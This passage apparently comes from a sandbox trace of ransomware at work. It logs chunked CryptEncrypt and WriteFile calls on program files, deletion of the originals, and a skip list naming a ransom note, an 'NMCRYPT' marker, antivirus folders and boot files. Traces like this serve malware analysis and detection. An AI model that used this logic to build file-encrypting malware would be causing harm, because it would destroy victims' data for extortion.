lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.629] GetLastError () returned 0x0 [0169.629] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.629] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.630] GetLastError () returned 0x0 [0169.630] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.630] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0xf7, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0xf7, lpOverlapped=0x0) returned 1 [0169.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf7, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.630] GetLastError () returned 0x0 [0169.630] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.630] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0169.630] WriteFile (in: hFile=0x15c4, lpBuffer=0x28828c0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0169.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0169.630] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc", dwFileAttributes=0x20) returned 0 [0169.631] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 1 [0169.631] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0 [0169.631] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" [0169.631] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB") returned 1 [0169.631] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXA36.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxa36.tmp")) returned 0xa36 [0169.632] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXA36.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxa36.tmp"), dwFlags=0x1) returned 0 [0169.632] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\.xXA36.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\.xxa36.tmp")) returned 1 [0169.633] CryptDestroyKey (hKey=0x9ad338) returned 1 [0169.633] wcslen (_String="OK") returned 0x2 [0169.633] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.633] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.633] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0169.633] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0169.633] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0169.633] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.633] PathMatchSpecW (pszFile="sqloledb.dll", pszSpec="*NMCRYPT") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.dll", pszSpec="*Recovers your files.html") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.dll", pszSpec="*.exe") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.dll", pszSpec="*.dll") returned 1 [0169.633] FindNextFileW (in: hFindFile=0x9ad538, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*NMCRYPT") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*Recovers your files.html") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.exe") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.dll") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.lnk") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.bat") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.ini") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.msi") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*.scf") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*pagefile.sys*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*NTUSER.DAT*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*AppData*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\winrar\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\java\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\TeamViewer\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\windows\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\ESET\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\AVG\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\AVIRA\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*\\AVAST Software\\*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*Atheros*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*Realtek*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*bootmgr*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*boot*") returned 0 [0169.633] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*boot*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*CONFIG.SYS*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*IO.SYS*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*MSDOS.SYS*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*NTDETECT.COM*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*ntldr*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*chrome*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*opera*") returned 0 [0169.634] PathMatchSpecW (pszFile="sqloledb.rll", pszSpec="*firefox*") returned 0 [0169.634] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll", pszSpec="*") returned 1 [0169.634] strlen (_Str="NMoreira") returned 0x8 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.634] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.635] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 